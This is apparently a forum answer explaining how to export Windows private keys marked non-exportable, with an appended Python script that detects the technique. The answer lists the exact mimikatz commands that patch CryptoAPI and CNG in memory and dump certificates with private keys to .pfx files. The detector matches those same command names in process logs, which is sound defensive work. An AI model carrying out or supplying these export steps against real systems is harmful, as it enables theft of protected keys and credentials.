You’re right, there is no API at all that I’m aware of to export a PrivateKey marked as non-exportable.
But if you patch (in memory) normal APIs, you can use the normal way to export 🙂
There is a new version of mimikatz that also supports CNG Export (Windows Vista / 7 / 2008 …)
- download (and launch with administrative privileges): http://blog.gentilkiwi.com/mimikatz (trunk version or last version)
Run it and enter the following commands in its prompt:
- privilege::debug (unless you already have it or target only CryptoApi)
- crypto::patchcng (nt 6) and/or crypto::patchcapi (nt 5 & 6)
- crypto::exportCertificates and/or crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE
The exported .pfx files are password protected with the password “mimikatz”.
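A defender's view of the sequence above, as an added example that is not part of the original answer: it scans process-creation records for the command names quoted in the answer and rates a process that both patches and exports as the full sequence. The event field names and the sample records are constructed assumptions, and commands typed at the tool's interactive prompt never reach a process command line, so this covers only invocations where they are passed as arguments.

```python
import re

# Command names exactly as given in the answer above, grouped by purpose.
STAGES = {
    "debug-privilege": ("privilege::debug",),
    "key-export-patch": ("crypto::patchcng", "crypto::patchcapi"),
    "certificate-export": ("crypto::exportCertificates",),
}

def stages_in(command_line):
    """Return the set of stages whose commands appear in one command line."""
    # Drop quotes and cmd.exe carets, then compare case-insensitively, so
    # trivially re-quoted or re-cased arguments still match.
    text = re.sub(r"[\"'^]", "", command_line).lower()
    return {stage for stage, cmds in STAGES.items()
            if any(cmd.lower() in text for cmd in cmds)}

def scan(events):
    """Group hits per (host, pid) and rate them.

    'high'   = an export patch and a certificate export in the same process,
               i.e. the complete sequence from the answer;
    'review' = any other subset of the commands.
    """
    per_process = {}
    for ev in events:
        hit = stages_in(ev["command_line"])
        if hit:
            per_process.setdefault((ev["host"], ev["pid"]), set()).update(hit)
    findings = []
    for (host, pid), stages in sorted(per_process.items()):
        full = {"key-export-patch", "certificate-export"} <= stages
        findings.append({"host": host, "pid": pid, "stages": sorted(stages),
                         "severity": "high" if full else "review"})
    return findings

# Constructed sample events (not real logs); field names are assumptions.
SAMPLE_EVENTS = [
    {"host": "WS01", "pid": 4120, "command_line":
     'tool.exe "privilege::debug" "crypto::patchcapi" '
     '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE"'},
    {"host": "WS02", "pid": 988, "command_line": "certutil -store My"},
    {"host": "WS03", "pid": 2044, "command_line": "x.exe PRIVILEGE::DEBUG"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```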